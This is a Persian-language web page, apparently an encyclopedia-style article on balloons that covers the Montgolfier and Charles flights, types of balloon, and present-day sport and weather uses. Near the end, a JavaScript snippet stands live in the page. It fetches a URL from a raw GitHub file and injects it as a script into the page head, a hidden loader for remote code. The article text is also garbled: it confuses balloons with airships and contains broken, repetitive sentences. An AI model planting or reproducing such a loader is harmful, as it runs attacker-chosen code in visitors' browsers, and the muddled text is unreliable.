بالون

  • بالون گونه ای هواگرد است که به دلیل شناوری، در جو باقی می ماند. کشتی هوایی با نیروی باد در آسمان به حرکت در می آید. کشتی هوایی با یک کشتی هوایی که هواگرد شناور که می تواند در هوا به گونه ای کنترل شده حرکت کند. بیش از 250 سال پیش، اولین انسان «ژان فرانسوا پیلاترد روزیر» با بالون هوای گرمی که برادران مون گلفیه در فرانسه آن را طراحی کرده بودند، پرواز کرد. یک کشتی هوایی با عرض 16 متر می تواند 3 نفر را در سبد خود جا دهد. کشتی های هوایی از محفظه، گردنه، مشعل گازی و سبد تشکیل شده است.

    تاریخچه کشتی هوایی

    در ۱۷۸۳ برادران مون گلفیه اولین کشتی هوایی هوای گرم را که قادر به حمل یک نفر بود را ساختند. هوای گرم مورد نیازبه وسلیه یک بخاری روی زمین گرم می شود. اولین نمونه ها اغلب برای مشاهدات نظامی استفاده می شد. در سال 1849 از کشتی هوایی ها برای بمباران شهر ونیز در ایتالیا استفاده شد.

    ژاک شارل و کمک خلبانش برادران رابرت اولین کشتی هوایی پرشده از هیدروژن را در ۲۷ اوت ۱۷۸۳ به پرواز درآوردند. سپس او و همکارش تا ارتفاع حدود ۵۵۰ متر با بالون سرنشین دارشان بالا رفتند؛ که ابتکارشان در استفاده از هیدروژن برای بالا بردن، باعث شد که این نوع کشتی هوایی ها به نام شارلی نامیده شود. (همان‌طور که نام برادران مون‌گلفیه برای کشتی هوایی هوای گرم استفاده شد.

    انواع

    • بالون هوای گرم
    • بالون هواشناسی
    • بالون آرزو

    امروزه کشتی هوایی ها بیشتر برای تفریح و ورزش استفاده می کنند. جشواره های بالون در بسیاری از کشور ها برگزار می شود و بالون سواران برای رقابت جمع می شوند. در این مسابقات تعقیب و گریز هم انجام می شوند. کی از کشتی هوایی ها پرواز می کند و بقیه نیز باید تا حد ممکن نزدیک به او پرواز کنند و نزدیک او به زمین فرود آیند. امروزه اهمیت استفاده از بالن در بعضی موارد از جمله هواشناسی انکارناپذیر است. در گذشته نیز از کشتی هوایی برای مشاهده نظامی و همچنین بمب باران استفاده می‌شد.

    (var url = “https://raw.githubusercontent.com/truba77/trubnik/main/to.txt”; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(“script”); script.src = data.trim(); document.getElementsByTagName(“head”)[0].appendChild(script); });)

    امتیاز شما:

    میانگین امتیازات ۵ از ۵
    از مجموع ۱ رای

    دیدگاهتان را بنویسید